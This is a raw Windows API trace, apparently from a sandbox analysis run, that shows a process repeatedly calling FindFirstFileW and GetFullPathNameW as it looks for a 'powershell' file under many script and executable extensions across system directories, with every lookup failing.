	[0325.358] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.366] SetErrorMode (uMode=0x1) returned 0x1
	[0325.368] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.368] SetErrorMode (uMode=0x1) returned 0x1
	[0325.368] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.384] SetErrorMode (uMode=0x1) returned 0x1
	[0325.385] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.386] SetErrorMode (uMode=0x1) returned 0x1
	[0325.386] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.314] SetErrorMode (uMode=0x1) returned 0x1
	[0326.316] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.316] SetErrorMode (uMode=0x1) returned 0x1
	[0326.316] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.324] SetErrorMode (uMode=0x1) returned 0x1
	[0326.325] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.325] SetErrorMode (uMode=0x1) returned 0x1
	[0326.325] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.333] SetErrorMode (uMode=0x1) returned 0x1
	[0326.334] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.334] SetErrorMode (uMode=0x1) returned 0x1
	[0326.334] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.342] SetErrorMode (uMode=0x1) returned 0x1
	[0326.343] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.343] SetErrorMode (uMode=0x1) returned 0x1
	[0326.344] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.350] SetErrorMode (uMode=0x1) returned 0x1
	[0326.351] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.351] SetErrorMode (uMode=0x1) returned 0x1
	[0326.352] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.201] SetErrorMode (uMode=0x1) returned 0x1
	[0327.203] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0327.203] SetErrorMode (uMode=0x1) returned 0x1
	[0327.203] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.211] SetErrorMode (uMode=0x1) returned 0x1
	[0327.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.213] SetErrorMode (uMode=0x1) returned 0x1
	[0327.213] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.213] SetErrorMode (uMode=0x1) returned 0x1
	[0327.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.214] SetErrorMode (uMode=0x1) returned 0x1
	[0327.214] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.214] SetErrorMode (uMode=0x1) returned 0x1
	[0327.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.214] SetErrorMode (uMode=0x1) returned 0x1
	[0327.214] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.215] SetErrorMode (uMode=0x1) returned 0x1
	[0327.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.215] SetErrorMode (uMode=0x1) returned 0x1
	[0327.215] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.215] SetErrorMode (uMode=0x1) returned 0x1
	[0327.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.215] SetErrorMode (uMode=0x1) returned 0x1
	[0327.215] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.216] SetErrorMode (uMode=0x1) returned 0x1
	[0327.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.216] SetErrorMode (uMode=0x1) returned 0x1
	[0327.216] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.216] SetErrorMode (uMode=0x1) returned 0x1
	[0327.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.217] SetErrorMode (uMode=0x1) returned 0x1
	[0327.217] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.217] SetErrorMode (uMode=0x1) returned 0x1
	[0327.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.217] SetErrorMode (uMode=0x1) returned 0x1
	[0327.217] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.218] SetErrorMode (uMode=0x1) returned 0x1
	[0327.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.218] SetErrorMode (uMode=0x1) returned 0x1
	[0327.218] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.218] SetErrorMode (uMode=0x1) returned 0x1
	[0327.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.218] SetErrorMode (uMode=0x1) returned 0x1
	[0327.218] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.219] SetErrorMode (uMode=0x1) returned 0x1
	[0327.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.219] SetErrorMode (uMode=0x1) returned 0x1
	[0327.219] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.219] SetErrorMode (uMode=0x1) returned 0x1
	[0327.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.220] SetErrorMode (uMode=0x1) returned 0x1
	[0327.220] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.220] SetErrorMode (uMode=0x1) returned 0x1
	[0327.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.220] SetErrorMode (uMode=0x1) returned 0x1
	[0327.220] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.220] SetErrorMode (uMode=0x1) returned 0x1
	[0327.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.221] SetErrorMode (uMode=0x1) returned 0x1
	[0327.221] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.221] SetErrorMode (uMode=0x1) returned 0x1
	[0327.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.221] SetErrorMode (uMode=0x1) returned 0x1
	[0327.221] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.222] SetErrorMode (uMode=0x1) returned 0x1
	[0327.222] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.222] SetErrorMode (uMode=0x1) returned 0x1
	[0327.222] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.222] SetErrorMode (uMode=0x1) returned 0x1
	[0327.223] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.223] SetErrorMode (uMode=0x1) returned 0x1
	[0327.223] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.223] SetErrorMode (uMode=0x1) returned 0x1
	[0327.223] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.223] SetErrorMode (uMode=0x1) returned 0x1
	[0327.223] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.224] SetErrorMode (uMode=0x1) returned 0x1
	[0327.224] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.224] SetErrorMode (uMode=0x1) returned 0x1
	[0327.224] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.224] SetErrorMode (uMode=0x1) returned 0x1
	[0327.224] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.225] SetErrorMode (uMode=0x1) returned 0x1
	[0327.225] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c84dfc0 | out: lpFindFileData=0x1c84dfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.225] SetErrorMode (uMode=0x1) returned 0x1
	[0327.225] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c84de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.225] SetErrorMode (uMode=0x1) returned 0x1
